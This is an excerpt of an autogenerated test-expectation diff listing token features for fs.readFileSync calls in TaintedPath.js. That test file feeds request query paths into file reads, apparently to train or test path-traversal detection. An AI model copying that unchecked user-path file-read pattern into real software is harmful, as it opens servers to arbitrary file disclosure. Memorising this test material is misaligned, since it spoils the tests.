split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:51 | fs.read ... h - 1]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:150:3:150:51 | fs.read ... h - 1]) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:150:6:150:17 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:6:150:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:6:150:17 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:150:6:150:17 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:150:6:150:17 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:150:19:150:24 | prefix | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:19:150:24 | prefix | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:19:150:24 | prefix | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:150:19:150:24 | prefix | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:150:19:150:24 | prefix | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:150:19:150:24 | prefix | stringConcatenatedWith | -endpoint- split.? | | autogenerated/TaintedPath/TaintedPath.js:150:19:150:50 | prefix ... th - 1] | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:150:19:150:50 | prefix ... th - 1] | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:150:19:150:50 | prefix ... th - 1] | calleeImports | fs | @@ -5873,6 +63155,72 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:150:19:150:50 | prefix ... th - 1] | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:150:19:150:50 | prefix ... th - 1] | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:150:19:150:50 | prefix ... th - 1] | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:150:28:150:32 | split | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:28:150:32 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:28:150:32 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:150:28:150:32 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:150:28:150:32 | split | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:150:28:150:50 | split[s ... th - 1] | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:28:150:50 | split[s ... th - 1] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:28:150:50 | split[s ... th - 1] | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:150:28:150:50 | split[s ... th - 1] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:150:28:150:50 | split[s ... th - 1] | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:150:28:150:50 | split[s ... th - 1] | stringConcatenatedWith | prefix -endpoint- | +| autogenerated/TaintedPath/TaintedPath.js:150:34:150:38 | split | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:34:150:38 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:34:150:38 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:150:34:150:38 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:150:34:150:38 | split | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:150:34:150:45 | split.length | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:34:150:45 | split.length | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:34:150:45 | split.length | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:150:34:150:45 | split.length | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:150:34:150:45 | split.length | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:150:34:150:49 | split.length - 1 | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:34:150:49 | split.length - 1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:34:150:49 | split.length - 1 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:150:34:150:49 | split.length - 1 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:150:34:150:49 | split.length - 1 | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:150:40:150:45 | length | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:40:150:45 | length | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:40:150:45 | length | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:150:40:150:45 | length | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:150:40:150:45 | length | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:150:49:150:49 | 1 | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:49:150:49 | 1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:150:49:150:49 | 1 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:150:49:150:49 | 1 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:150:49:150:49 | 1 | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:4 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:4 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:4 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:4 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:17 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:17 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:17 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:17 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:27 | exceptional return of fs.read ... lit[x]) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:27 | exceptional return of fs.read ... lit[x]) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:27 | exceptional return of fs.read ... lit[x]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:27 | exceptional return of fs.read ... lit[x]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:27 | exceptional return of fs.read ... lit[x]) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:27 | fs.read ... lit[x]) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:27 | fs.read ... lit[x]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:27 | fs.read ... lit[x]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:27 | fs.read ... lit[x]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:152:3:152:27 | fs.read ... lit[x]) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:152:6:152:17 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:152:6:152:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:152:6:152:17 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:152:6:152:17 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:152:6:152:17 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:152:19:152:23 | split | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:152:19:152:23 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:152:19:152:23 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:152:19:152:23 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:152:19:152:23 | split | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:152:19:152:26 | split[x] | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:152:19:152:26 | split[x] | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:152:19:152:26 | split[x] | calleeImports | fs | @@ -5882,6 +63230,42 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:152:19:152:26 | split[x] | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:152:19:152:26 | split[x] | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:152:19:152:26 | split[x] | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:152:25:152:25 | x | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:152:25:152:25 | x | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:152:25:152:25 | x | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:152:25:152:25 | x | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:152:25:152:25 | x | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:4 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:4 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:4 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:4 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:17 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:17 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:17 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:17 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:36 | exceptional return of fs.read ... lit[x]) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:36 | exceptional return of fs.read ... lit[x]) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:36 | exceptional return of fs.read ... lit[x]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:36 | exceptional return of fs.read ... lit[x]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:36 | exceptional return of fs.read ... lit[x]) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:36 | fs.read ... lit[x]) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:36 | fs.read ... lit[x]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:36 | fs.read ... lit[x]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:36 | fs.read ... lit[x]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:153:3:153:36 | fs.read ... lit[x]) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:153:6:153:17 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:6:153:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:6:153:17 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:153:6:153:17 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:153:6:153:17 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:153:19:153:24 | prefix | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:19:153:24 | prefix | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:19:153:24 | prefix | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:153:19:153:24 | prefix | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:153:19:153:24 | prefix | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:153:19:153:24 | prefix | stringConcatenatedWith | -endpoint- split.? | | autogenerated/TaintedPath/TaintedPath.js:153:19:153:35 | prefix + split[x] | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:153:19:153:35 | prefix + split[x] | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:153:19:153:35 | prefix + split[x] | calleeImports | fs | @@ -5891,6 +63275,63 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:153:19:153:35 | prefix + split[x] | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:153:19:153:35 | prefix + split[x] | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:153:19:153:35 | prefix + split[x] | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:153:28:153:32 | split | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:28:153:32 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:28:153:32 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:153:28:153:32 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:153:28:153:32 | split | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:153:28:153:35 | split[x] | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:28:153:35 | split[x] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:28:153:35 | split[x] | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:153:28:153:35 | split[x] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:153:28:153:35 | split[x] | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:153:28:153:35 | split[x] | stringConcatenatedWith | prefix -endpoint- | +| autogenerated/TaintedPath/TaintedPath.js:153:34:153:34 | x | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:34:153:34 | x | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:153:34:153:34 | x | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:153:34:153:34 | x | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:153:34:153:34 | x | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:155:7:155:15 | concatted | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:155:7:155:15 | concatted | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:155:7:155:15 | concatted | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:155:7:155:15 | concatted | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:155:7:155:15 | concatted | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:155:7:155:38 | concatt ... (split) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:155:7:155:38 | concatt ... (split) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:155:7:155:38 | concatt ... (split) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:155:7:155:38 | concatt ... (split) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:155:7:155:38 | concatt ... (split) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:155:7:155:38 | concatted | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:155:7:155:38 | concatted | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:155:7:155:38 | concatted | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:155:7:155:38 | concatted | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:155:7:155:38 | concatted | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:24 | prefix | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:24 | prefix | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:24 | prefix | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:24 | prefix | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:24 | prefix | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:24 | prefix | stringConcatenatedWith | -endpoint- split | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:31 | prefix.concat | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:31 | prefix.concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:31 | prefix.concat | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:31 | prefix.concat | enclosingFunctionName | http.createServer#functionalargument | +| 